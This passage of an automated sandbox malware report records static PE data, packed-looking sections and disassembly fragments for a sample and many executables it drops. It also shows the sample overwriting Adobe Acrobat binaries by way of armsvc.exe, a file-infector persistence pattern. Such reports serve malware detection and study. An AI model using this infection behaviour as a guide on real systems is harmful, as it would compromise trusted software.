            Source: elevation_service.exe.0.drStatic PE information: section name: .gxfg
            Source: elevation_service.exe.0.drStatic PE information: section name: .retplne
            Source: elevation_service.exe.0.drStatic PE information: section name: _RDATA
            Source: elevation_service.exe.0.drStatic PE information: section name: malloc_h
            Source: maintenanceservice.exe.0.drStatic PE information: section name: .00cfg
            Source: maintenanceservice.exe.0.drStatic PE information: section name: .voltbl
            Source: maintenanceservice.exe.0.drStatic PE information: section name: _RDATA
            Source: msdtc.exe.0.drStatic PE information: section name: .didat
            Source: msiexec.exe.0.drStatic PE information: section name: .didat
            Source: MsSense.exe.0.drStatic PE information: section name: .didat
            Source: armsvc.exe.0.drStatic PE information: section name: .didat
            Source: alg.exe.0.drStatic PE information: section name: .didat
            Source: FXSSVC.exe.0.drStatic PE information: section name: .didat
            Source: elevation_service.exe0.0.drStatic PE information: section name: .00cfg
            Source: elevation_service.exe0.0.drStatic PE information: section name: .gxfg
            Source: elevation_service.exe0.0.drStatic PE information: section name: .retplne
            Source: elevation_service.exe0.0.drStatic PE information: section name: _RDATA
            Source: elevation_service.exe0.0.drStatic PE information: section name: malloc_h
            Source: Spectrum.exe.0.drStatic PE information: section name: .didat
            Source: maintenanceservice.exe.2.drStatic PE information: section name: .00cfg
            Source: maintenanceservice.exe.2.drStatic PE information: section name: .voltbl
            Source: maintenanceservice.exe.2.drStatic PE information: section name: _RDATA
            Source: minidump-analyzer.exe.2.drStatic PE information: section name: .00cfg
            Source: minidump-analyzer.exe.2.drStatic PE information: section name: .voltbl
            Source: GoogleCrashHandler64.exe.2.drStatic PE information: section name: _RDATA
            Source: GoogleCrashHandler64.exe.2.drStatic PE information: section name: .gxfg
            Source: GoogleCrashHandler64.exe.2.drStatic PE information: section name: .gehcont
            Source: GoogleUpdateComRegisterShell64.exe.2.drStatic PE information: section name: _RDATA
            Source: GoogleUpdateComRegisterShell64.exe.2.drStatic PE information: section name: .gxfg
            Source: GoogleUpdateComRegisterShell64.exe.2.drStatic PE information: section name: .gehcont
            Source: 117.0.5938.149_117.0.5938.132_chrome_updater.exe.2.drStatic PE information: section name: .00cfg
            Source: 117.0.5938.149_117.0.5938.132_chrome_updater.exe.2.drStatic PE information: section name: .retplne
            Source: pingsender.exe.2.drStatic PE information: section name: .00cfg
            Source: pingsender.exe.2.drStatic PE information: section name: .voltbl
            Source: 117.0.5938.149_117.0.5938.132_chrome_updater.exe0.2.drStatic PE information: section name: .00cfg
            Source: 117.0.5938.149_117.0.5938.132_chrome_updater.exe0.2.drStatic PE information: section name: .retplne
            Source: plugin-container.exe.2.drStatic PE information: section name: .00cfg
            Source: plugin-container.exe.2.drStatic PE information: section name: .voltbl
            Source: private_browsing.exe.2.drStatic PE information: section name: .00cfg
            Source: private_browsing.exe.2.drStatic PE information: section name: .voltbl
            Source: updater.exe.2.drStatic PE information: section name: .00cfg
            Source: updater.exe.2.drStatic PE information: section name: .voltbl
            Source: updater.exe.2.drStatic PE information: section name: _RDATA
            Source: TieringEngineService.exe.2.drStatic PE information: section name: .didat
            Source: vds.exe.2.drStatic PE information: section name: .didat
            Source: VSSVC.exe.2.drStatic PE information: section name: .didat
            Source: unpack200.exe.2.drStatic PE information: section name: .00cfg
            Source: ie_to_edge_stub.exe.2.drStatic PE information: section name: .00cfg
            Source: ie_to_edge_stub.exe.2.drStatic PE information: section name: .gxfg
            Source: ie_to_edge_stub.exe.2.drStatic PE information: section name: .retplne
            Source: ie_to_edge_stub.exe.2.drStatic PE information: section name: _RDATA
            Source: WmiApSrv.exe.2.drStatic PE information: section name: .didat
            Source: wmpnetwk.exe.2.drStatic PE information: section name: .didat
            Source: SearchIndexer.exe.2.drStatic PE information: section name: .didat
            Source: cookie_exporter.exe.2.drStatic PE information: section name: .00cfg
            Source: cookie_exporter.exe.2.drStatic PE information: section name: .gxfg
            Source: cookie_exporter.exe.2.drStatic PE information: section name: .retplne
            Source: cookie_exporter.exe.2.drStatic PE information: section name: _RDATA
            Source: identity_helper.exe.2.drStatic PE information: section name: .00cfg
            Source: identity_helper.exe.2.drStatic PE information: section name: .gxfg
            Source: identity_helper.exe.2.drStatic PE information: section name: .retplne
            Source: identity_helper.exe.2.drStatic PE information: section name: _RDATA
            Source: identity_helper.exe.2.drStatic PE information: section name: malloc_h
            Source: setup.exe.2.drStatic PE information: section name: .00cfg
            Source: setup.exe.2.drStatic PE information: section name: .gxfg
            Source: setup.exe.2.drStatic PE information: section name: .retplne
            Source: setup.exe.2.drStatic PE information: section name: LZMADEC
            Source: setup.exe.2.drStatic PE information: section name: _RDATA
            Source: setup.exe.2.drStatic PE information: section name: malloc_h
            Source: msedgewebview2.exe.2.drStatic PE information: section name: .00cfg
            Source: msedgewebview2.exe.2.drStatic PE information: section name: .gxfg
            Source: msedgewebview2.exe.2.drStatic PE information: section name: .retplne
            Source: msedgewebview2.exe.2.drStatic PE information: section name: CPADinfo
            Source: msedgewebview2.exe.2.drStatic PE information: section name: LZMADEC
            Source: msedgewebview2.exe.2.drStatic PE information: section name: _RDATA
            Source: msedgewebview2.exe.2.drStatic PE information: section name: malloc_h
            Source: msedge_proxy.exe.2.drStatic PE information: section name: .00cfg
            Source: msedge_proxy.exe.2.drStatic PE information: section name: .gxfg
            Source: msedge_proxy.exe.2.drStatic PE information: section name: .retplne
            Source: msedge_proxy.exe.2.drStatic PE information: section name: _RDATA
            Source: msedge_proxy.exe.2.drStatic PE information: section name: malloc_h
            Source: msedge_pwa_launcher.exe.2.drStatic PE information: section name: .00cfg
            Source: msedge_pwa_launcher.exe.2.drStatic PE information: section name: .gxfg
            Source: msedge_pwa_launcher.exe.2.drStatic PE information: section name: .retplne
            Source: msedge_pwa_launcher.exe.2.drStatic PE information: section name: LZMADEC
            Source: msedge_pwa_launcher.exe.2.drStatic PE information: section name: _RDATA
            Source: msedge_pwa_launcher.exe.2.drStatic PE information: section name: malloc_h
            Source: notification_click_helper.exe.2.drStatic PE information: section name: .00cfg
            Source: notification_click_helper.exe.2.drStatic PE information: section name: .gxfg
            Source: notification_click_helper.exe.2.drStatic PE information: section name: .retplne
            Source: notification_click_helper.exe.2.drStatic PE information: section name: CPADinfo
            Source: notification_click_helper.exe.2.drStatic PE information: section name: _RDATA
            Source: notification_click_helper.exe.2.drStatic PE information: section name: malloc_h
            Source: pwahelper.exe.2.drStatic PE information: section name: .00cfg
            Source: pwahelper.exe.2.drStatic PE information: section name: .gxfg
            Source: pwahelper.exe.2.drStatic PE information: section name: .retplne
            Source: pwahelper.exe.2.drStatic PE information: section name: _RDATA
            Source: pwahelper.exe.2.drStatic PE information: section name: malloc_h
            Source: msedge_proxy.exe0.2.drStatic PE information: section name: .00cfg
            Source: msedge_proxy.exe0.2.drStatic PE information: section name: .gxfg
            Source: msedge_proxy.exe0.2.drStatic PE information: section name: .retplne
            Source: msedge_proxy.exe0.2.drStatic PE information: section name: _RDATA
            Source: msedge_proxy.exe0.2.drStatic PE information: section name: malloc_h
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeCode function: 2_3_022340BD push rbp; iretd 2_3_022340BE
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeCode function: 2_3_02007DD2 push rsp; ret 2_3_02007DD9
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeCode function: 2_3_02007DD2 push rsp; ret 2_3_02007DD9
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeCode function: 2_3_02007DD2 push rsp; ret 2_3_02007DD9
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeCode function: 2_3_02007DD2 push rsp; ret 2_3_02007DD9
            Source: C:\Windows\System32\AppVClient.exeCode function: 7_2_00BA68CE push E9000001h; retn 0000h7_2_00BA68D3
            Source: C:\Windows\System32\AppVClient.exeCode function: 7_2_00BA52E3 push E9000001h; retf 0000h7_2_00BA52E8
            Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exeCode function: 10_2_009968CE push E9000001h; retn 0000h10_2_009968D3
            Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exeCode function: 10_2_009952E3 push E9000001h; retf 0000h10_2_009952E8
            Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exeCode function: 11_2_00CD68CE push E9000001h; retn 0000h11_2_00CD68D3
            Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exeCode function: 11_2_00CD52E3 push E9000001h; retf 0000h11_2_00CD52E8
            Source: C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exeCode function: 13_2_00BC68CE push E9000001h; retn 0000h13_2_00BC68D3
            Source: C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exeCode function: 13_2_00BC52E3 push E9000001h; retf 0000h13_2_00BC52E8
            Source: C:\Windows\SysWOW64\perfhost.exeCode function: 14_2_008558F1 push 00855856h; ret 14_2_00855908
            Source: C:\Windows\SysWOW64\perfhost.exeCode function: 14_2_00855917 push 00855856h; ret 14_2_00855908
            Source: C:\Windows\SysWOW64\perfhost.exeCode function: 14_2_00858140 push 00855D22h; ret 14_2_00855CB0
            Source: C:\Windows\SysWOW64\perfhost.exeCode function: 14_2_00858140 push 00855C60h; ret 14_2_00855D09
            Source: C:\Windows\SysWOW64\perfhost.exeCode function: 14_2_00858140 push 00855FAEh; ret 14_2_00855F1A
            Source: C:\Windows\SysWOW64\perfhost.exeCode function: 14_2_00858140 push 00855EE7h; ret 14_2_00855F39
            Source: C:\Windows\SysWOW64\perfhost.exeCode function: 14_2_00858140 push 008562B2h; ret 14_2_0085604C
            Source: C:\Windows\SysWOW64\perfhost.exeCode function: 14_2_00858140 push 0085631Bh; ret 14_2_0085639A
            Source: C:\Windows\SysWOW64\perfhost.exeCode function: 14_2_00858140 push 008563FFh; ret 14_2_0085642E
            Source: C:\Windows\SysWOW64\perfhost.exeCode function: 14_2_00858140 push 00856C2Dh; ret 14_2_00856C55
            Source: C:\Windows\SysWOW64\perfhost.exeCode function: 14_2_00858140 push 00856D50h; ret 14_2_00856CA5
            Source: C:\Windows\SysWOW64\perfhost.exeCode function: 14_2_00858140 push 00856FD5h; ret 14_2_00856D31
            Source: C:\Windows\SysWOW64\perfhost.exeCode function: 14_2_00858140 push 00856FDFh; ret 14_2_00856DE5
            Source: C:\Windows\SysWOW64\perfhost.exeCode function: 14_2_00858140 push 00856D86h; ret 14_2_00856E6E
            Source: C:\Windows\SysWOW64\perfhost.exeCode function: 14_2_00858140 push 00856EFDh; ret 14_2_00856E8A
            Source: C:\Windows\SysWOW64\perfhost.exeCode function: 14_2_00858140 push 00857342h; ret 14_2_00856EAE
            Source: C:\Windows\SysWOW64\perfhost.exeCode function: 14_2_00858140 push 008571D0h; ret 14_2_00856EE0
            Source: C:\Windows\SysWOW64\perfhost.exeCode function: 14_2_00858140 push 00856F98h; ret 14_2_00856F15
            Source: SABXJ1B5c8.exeStatic PE information: section name: .reloc entropy: 7.9204863406628485
            Source: elevation_service.exe.0.drStatic PE information: section name: .reloc entropy: 7.933968207053835
            Source: AppVClient.exe.0.drStatic PE information: section name: .reloc entropy: 7.92358666456881
            Source: FXSSVC.exe.0.drStatic PE information: section name: .reloc entropy: 7.930092063873972
            Source: elevation_service.exe0.0.drStatic PE information: section name: .reloc entropy: 7.931735605522291
            Source: SensorDataService.exe.0.drStatic PE information: section name: .reloc entropy: 7.922535252886395
            Source: Spectrum.exe.0.drStatic PE information: section name: .reloc entropy: 7.933307692898294
            Source: minidump-analyzer.exe.2.drStatic PE information: section name: .reloc entropy: 7.92235452649725
            Source: 117.0.5938.149_117.0.5938.132_chrome_updater.exe.2.drStatic PE information: section name: .reloc entropy: 7.9221238618110705
            Source: 117.0.5938.149_117.0.5938.132_chrome_updater.exe0.2.drStatic PE information: section name: .reloc entropy: 7.922123475619713
            Source: Aut2exe.exe.2.drStatic PE information: section name: .rsrc entropy: 7.796128458164721
            Source: Aut2exe_x64.exe.2.drStatic PE information: section name: .rsrc entropy: 7.796259909897694
            Source: AgentService.exe.2.drStatic PE information: section name: .reloc entropy: 7.924371300342963
            Source: vds.exe.2.drStatic PE information: section name: .reloc entropy: 7.928791299191825
            Source: VSSVC.exe.2.drStatic PE information: section name: .reloc entropy: 7.9271401836974515
            Source: wbengine.exe.2.drStatic PE information: section name: .reloc entropy: 7.929014929044329
            Source: wmpnetwk.exe.2.drStatic PE information: section name: .reloc entropy: 7.934820515835558
            Source: SearchIndexer.exe.2.drStatic PE information: section name: .reloc entropy: 7.93377743033685
            Source: 7zFM.exe.2.drStatic PE information: section name: .reloc entropy: 7.919199831626081
            Source: 7zG.exe.2.drStatic PE information: section name: .reloc entropy: 7.914533529797201
            Source: identity_helper.exe.2.drStatic PE information: section name: .reloc entropy: 7.928240694154064
            Source: setup.exe.2.drStatic PE information: section name: .reloc entropy: 7.932280192979255
            Source: msedgewebview2.exe.2.drStatic PE information: section name: .reloc entropy: 7.923544381512515
            Source: msedge_proxy.exe.2.drStatic PE information: section name: .reloc entropy: 7.929864411593221
            Source: msedge_pwa_launcher.exe.2.drStatic PE information: section name: .reloc entropy: 7.934252114293858
            Source: notification_click_helper.exe.2.drStatic PE information: section name: .reloc entropy: 7.931770901824541
            Source: pwahelper.exe.2.drStatic PE information: section name: .reloc entropy: 7.928400747025173
            Source: msedge_proxy.exe0.2.drStatic PE information: section name: .reloc entropy: 7.929856092043988

            Persistence and Installation Behavior

            barindex
            Source: C:\Users\user\Desktop\SABXJ1B5c8.exeFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to behavior
            Source: C:\Users\user\Desktop\SABXJ1B5c8.exeFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to behavior
            Source: C:\Users\user\Desktop\SABXJ1B5c8.exeFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to behavior
            Source: C:\Users\user\Desktop\SABXJ1B5c8.exeFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to behavior
            Source: C:\Users\user\Desktop\SABXJ1B5c8.exeFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to behavior
            Source: C:\Users\user\Desktop\SABXJ1B5c8.exeFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to behavior
            Source: C:\Users\user\Desktop\SABXJ1B5c8.exeFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to behavior
            Source: C:\Users\user\Desktop\SABXJ1B5c8.exeFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to behavior
            Source: C:\Users\user\Desktop\SABXJ1B5c8.exeFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to behavior
            Source: C:\Users\user\Desktop\SABXJ1B5c8.exeFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to behavior
            Source: C:\Users\user\Desktop\SABXJ1B5c8.exeFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to behavior
            Source: C:\Users\user\Desktop\SABXJ1B5c8.exeFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to behavior
            Source: C:\Users\user\Desktop\SABXJ1B5c8.exeFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to behavior
            Source: C:\Users\user\Desktop\SABXJ1B5c8.exeFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeJump to behavior
